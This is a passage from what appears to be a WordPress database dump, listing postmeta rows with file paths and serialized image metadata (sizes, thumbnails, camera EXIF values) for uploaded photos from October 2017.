\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(356,148,'_wp_attached_file','2017/10/wallpaper-1492818_960_720.jpg'),(357,148,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:634;s:4:\"file\";s:37:\"2017/10/wallpaper-1492818_960_720.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"wallpaper-1492818_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"wallpaper-1492818_960_720-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"wallpaper-1492818_960_720-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(358,149,'_wp_attached_file','2017/10/war-child.png'),(359,149,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:597;s:4:\"file\";s:21:\"2017/10/war-child.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"war-child-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"war-child-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(360,150,'_wp_attached_file','2017/10/war.jpg'),(361,150,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:15:\"2017/10/war.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"war-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"war-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"war-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:10:\"NIKON D600\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"85\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:8:\"0.000625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(362,151,'_wp_attached_file','2017/10/warwick-castle.jpg'),(363,151,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:26:\"2017/10/warwick-castle.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"warwick-castle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"warwick-castle-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"warwick-castle-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"warwick-castle-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"warwick-castle-1170x780.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:780;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(364,152,'_wp_attached_file','2017/10/waste-bin.jpg'),(365,152,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:21:\"2017/10/waste-bin.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"waste-bin-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"waste-bin-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"waste-bin-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:4:\"NX20\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"55\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(366,153,'_wp_attached_file','2017/10/waste-disposal.jpg'),(367,153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:26:\"2017/10/waste-disposal.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"waste-disposal-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"waste-disposal-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"waste-disposal-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:17:\"Canon EOS Kiss X5\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(368,154,'_wp_attached_file','2017/10/waste-yard.jpg'),(369,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/waste-yard.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"waste-yard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"waste-yard-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"waste-yard-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(370,155,'_wp_attached_file','2017/10/waste.jpg'),(371,155,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3072;s:6:\"height\";i:2048;s:4:\"file\";s:17:\"2017/10/waste.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"waste-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"waste-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"waste-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"waste-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"waste-1170x780.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:780;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(372,156,'_wp_attached_file','2017/10/water-supply.jpg'),(373,156,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:445;s:6:\"height\";i:720;s:4:\"file\";s:24:\"2017/10/water-supply.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"water-supply-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"water-supply-185x300.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D3300\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"46\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(374,157,'_wp_attached_file','2017/10/water-wise.png'),(375,157,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:355;s:6:\"height\";i:94;s:4:\"file\";s:22:\"2017/10/water-wise.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"water-wise-150x94.png\";s:5:\"width\";i:150;s:6:\"height\";i:94;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"water-wise-300x79.png\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(376,158,'_wp_attached_file','2017/10/waterful.jpg'),(377,158,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:539;s:4:\"file\";s:20:\"2017/10/waterful.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"waterful-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"waterful-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"waterful-768x431.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(378,159,'_wp_attached_file','2017/10/wave-sms.png'),(379,159,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:262;s:6:\"height\";i:68;s:4:\"file\";s:20:\"2017/10/wave-sms.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"wave-sms-150x68.png\";s:5:\"width\";i:150;s:6:\"height\";i:68;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(380,160,'_wp_attached_file','2017/10/web-cam.jpg'),(381,160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:19:\"2017/10/web-cam.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"web-cam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"web-cam-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"web-cam-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(382,161,'_wp_attached_file','2017/10/web-design.jpg'),(383,161,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/web-design.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"web-design-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"web-design-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"web-design-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(384,162,'_wp_attached_file','2017/10/web-design.png'),(385,162,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2017/10/web-design.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"web-design-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"web-design-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"web-design-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(386,163,'_wp_attached_file','2017/10/web-hosting.jpg'),(387,163,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:700;s:4:\"file\";s:23:\"2017/10/web-hosting.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"web-hosting-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"web-hosting-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"web-hosting-768x560.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(388,164,'_wp_attached_file','2017/10/web-symbol.jpg'),(389,164,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:22:\"2017/10/web-symbol.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"web-symbol-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"web-symbol-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"web-symbol-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(390,165,'_wp_attached_file','2017/10/website-change.jpg'),(391,165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:637;s:4:\"file\";s:26:\"2017/10/website-change.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"website-change-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"website-change-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"website-change-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(392,166,'_wp_attached_file','2017/10/WEDDING-DRINK.jpg'),(393,166,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:25:\"2017/10/WEDDING-DRINK.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"WEDDING-DRINK-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"WEDDING-DRINK-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"WEDDING-DRINK-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 30D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"45\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:7:\"0.00025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(394,167,'_wp_attached_file','2017/10/wedding-event.jpg'),(395,167,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:639;s:4:\"file\";s:25:\"2017/10/wedding-event.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"wedding-event-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"wedding-event-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"wedding-event-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(396,168,'_wp_attached_file','2017/10/wedding-inva.jpg'),(397,168,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:24:\"2017/10/wedding-inva.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"wedding-inva-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"wedding-inva-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"wedding-inva-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 600D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1353077149\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(398,169,'_wp_attached_file','2017/10/wedding-kiss.jpg'),(399,169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:998;s:4:\"file\";s:24:\"2017/10/wedding-kiss.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"wedding-kiss-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"wedding-kiss-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"wedding-kiss-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"wedding-kiss-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"wedding-kiss-1170x778.jpg